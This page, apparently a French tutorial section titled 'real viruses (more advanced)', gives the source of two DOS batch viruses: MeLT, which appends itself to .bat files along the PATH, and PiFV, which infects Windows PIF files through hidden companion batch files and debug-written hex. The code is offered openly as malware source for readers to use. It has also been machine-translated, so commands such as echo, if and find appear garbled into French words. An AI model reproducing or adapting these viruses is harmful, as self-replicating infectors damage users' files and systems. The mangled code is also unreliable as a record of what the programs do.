Étape 2: Vrais virus (plus avancés)
1. le plus puissant*******************
pas ' %0 ==' si ' % _melt % ==' goto meltbeg
::---Accueil mannequin---
hors
echo Bonjour tout le monde !
::---Accueil mannequin fin---
MeLTend [MeLT_2a]
: MeLTbeg
% _MeLT %
Si ' 1 % ==' goto fonte faire fondre 2 %
dans le cas contraire les existent % comspec % set comspec = % _MeLT % commande
% comspec % /e:5000 /c %0 Faire fondre le vir
Set MeLTcl = 1 %%2 %3 %4 %5 %6 %7 %8 %9
appel %0 Faire fondre le rh
Set _MeLT =
Set MeLTcl =
Goto MeLTend
: MeLTrh
Set _MeLT = x
%0 % MeLTcl %
: MeLTvir
Morin de la valeur = 0 %
sinon il existe %_MeLT%%temp%\nul set temp = %tmp%
Si existe %temp%\MeLT_2a goto MeLTrun
%0 Faire fondre le fnd. %Path%
: MeLTfnd
Maj % _MeLT %
Si ' %2 ==' sortie de fonte
Set MeLT=%2\%MeLTH%.bat
dans le cas contraire les existent fonte % valeur MeLT=%2\%MeLTH%
dans le cas contraire les existent fonte % valeur MeLT=%2%MeLTH%.bat
dans le cas contraire les existent fonte % set fonte = %2 % Morin
dans le cas contraire les existent % fonte % goto MeLTfnd
trouver "MeLT" < % fonte % > %temp%\MeLT_2a
attrib %temp%\MeLT_2a + h
: MeLTrun
% Morin MeLT s. .. %Path%
: Fond
Maj % _MeLT %
Si ' %2 ==' sortie de fonte
pour %% dans (%2\*.bat % 2*.bat) appellent Morin % inf fonte %%d Ko
Goto MeLTs
: MeLTinf
trouver/i "MeLT" < %3 > nul
sinon errorlevel 1 goto MeLTno
pas d’écho ' %% 0 ==' si ' %% _melt %% ==' goto meltbeg > MeLT.t
type de %3 >> MeLT.t
écho. >> MeLT.t
tapez %temp%\MeLT_2a >> MeLT.t
déplacer MeLT.t %3 > nul
sortie de fonte
: MeLTact - flash-fonte de texte à l’écran puis remettre à la normale
e l’écho 100 BA D0 07 BB 00 B8 8E C3 8 b CA 33 FF 26 8 b 05 FE > MeLT.t
echo e 110 C0 FE C4 26 89 05 47 47 E8 E2 F2 FE 06 24 01 75 >> MeLT.t
echo e 120 B4 4 C CD 21 00 >> MeLT.t
l’écho g >> MeLT.t
nul de débogage < MeLT.t >
del MeLT.t
sortie de fonte
: MeLTno
Définissez MeLTC = % MeLTC %1
Si MeLTC % == 1111111111 goto MeLTact
: MeLTend
*******************************************
2. il s’agit d’un virus qui infecte les fichiers PIF, utilisés par Windows pour
exécuter des programmes DOS. Il fonctionne en créant des lots caché compagnon
contenant des copies de cela puis modifier le fichier PIF alors que le
lot de compagnon s’exécute en premier. Après le compagnon s’exécute, il exécute le
programme d’accueil original, dont le nom est codé dans le
compagnon. Les fichiers pif sont marquées afin qu’ils ne seront pas
réinfecté. Seulement PIF est touchés, sans modifications sont apportées à
les programmes infectés. Pour « guérir », utilisez PIFEDIT pour restaurer la
les noms de fichier original puis supprimez les fichiers cachés.
**********************************************
hors
:: nom de l’hôte...
Set pifvo=LIST.COM
:: boucle répartiteur...
Si ' 1 % ==' goto PiFV PiFV_ %2
:: exécuter le virus !
Set _PiFV =
dans le cas contraire les existent % comspec % set comspec=C:\COMMAND.COM%_PiFV%
% comspec % /e:5000 /c %0 PiFV aller > nul
Si existe PiFV ! del PiFV !
:: exécution de l’hôte
Set PiFVcl = 1 %%2 %3 %4 %5 %6 %7 %8 %9
appel %0 PiFV TVH
Set PiFVo =
Set PiFVcl =
:: vérifier pour l’activation...
écho. | Date|Find/i « samedi » > nul. PiFV
Si errorlevel 1 goto PiFV_end
écho. | Time|Find « 7 » > nul. PiFV
Si errorlevel 1 goto PiFV_msg
Set PiFV = echo
CLS % _PiFV %
% PiFV %.
% PiFV % il était une fois une loutre nommée contrôleur
% PiFV % qui prétend savoir comment faire de l’eau.
% PiFV % « Aucune autres barrages », a-t-il dit, « utiliser mon eau à la place! »
% PiFV % mais la loutre aîné n’était pas impressionné.
pause > nul. PiFV
Set PiFV =
Goto PiFV_end
: PiFV_msg
Echo [PiFV] par WaveFunc
Goto PiFV_end
: PiFV_hst
% PiFVo % PiFVcl %
Goto PiFV_end
: PiFV_go
Set PiFVh = 0 %
sinon il existe la valeur % PiFVh % PiFVh=%0.bat
dans le cas contraire les existent % PiFVh % sortie
pour %% dans (*.pif) appelez %0 PiFV inf %%d Ko
sortie PiFV
: PiFV_inf
Set PiFVp = %3
:: obtenez victime marqueur filename et infection
:: du fichier PIF en utilisant debug...
Si existe PiFV ! Goto PiFV_1
echo m 524 124 162 > PiFV !
e l’écho 100' fn =' >> PiFV !
echo m 108 524 562 >> PiFV !
echo pifv n $.bat >> PiFV !
l’écho de rcx >> PiFV !
47 l’écho >> PiFV !
écho w >> PiFV !
echo m 55E, 561 108 >> PiFV !
ECHO a 10C 0 >> PiFV !
echo pifv n $$ .bat >> PiFV !
l’écho de rcx >> PiFV !
10 l’écho >> PiFV !
écho w >> PiFV !
echo q >> PiFV !
: PiFV_1
déboguer % PiFVp % < PiFV! > nul
Appelez PiFV$
Set PiFVn = % fn
Appelez PiFV$ $
Set PiFVi = % fn
del PiFV$?. bat
:: pifvn = nom de fichier orig
:: pifvi = marqueur de l’infection
:: pifvp = nom de fichier pif
:: pifvh = fichier bat compagnon
:: sauter pifs infectés ou « vide »...
Si ' % PiFVi % =='PiFV goto PiFV_end
Si ' % PiFVn % ==' goto PiFV_end
:: ne pas occulter command.com (être gentil)
écho % PiFVn % |gestion/i « commande » > nul
sinon errorlevel 1 goto PiFV_end
:: susceptible d’être infecté - créer un lot de compagnon...
:: (le code suivant se dénude l’extension)
echo e 100 e8 16 00 b4 08 cd 21 3C 00 74 0c 3c 2e 74 08 88 > PiFV$ $
echo e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21 >> PiFV$ $
écho c3 e 120 73 65 74 20 66 6F 3d 24 00 >> PiFV$ $
echo pifv n $.com >> PiFV$ $
l’écho de rcx >> PiFV$ $
Echo 2 a >> PiFV$ $
écho w >> PiFV$ $
echo q >> PiFV$ $
déboguer < PiFV$ $> nul
echo % PiFVn % |PiFV$ > PiFV$ $.bat
Appelez PiFV$ $
Set PiFVb=%fn%.bat
del PiFV$?. *
:: pifvb = nouveau nom de la feuille
:: ombre pas si comp a le même nom en tant qu’hôte
Si % PiFVo % == % PiFVb % goto PiFV_end
Si existe % PiFVb % goto PiFV_end
echo off > % PiFVb %
echo la valeur pifvo = % pifvn % >> % PiFVb %
trouver "PiFV" < % PiFVh % >> % PiFVb %
attrib % PiFVb % + h
::.. .et point le FRP à la compagne
e l’écho 15E « PiFV », 0 > PiFV$ $
echo e 124 « % PiFVb % », 0 >> PiFV$ $
écho w >> PiFV$ $
echo q >> PiFV$ $
déboguer % PiFVp % < PiFV$ $> nul
del PiFV$ $
:: Je pense que nous aurons terminé !
sortie PiFV
: PiFV_end
:: se demandent combien de bogues tout ce qui a dedans ? Un seul
:: moyen de savoir...
***************************************************
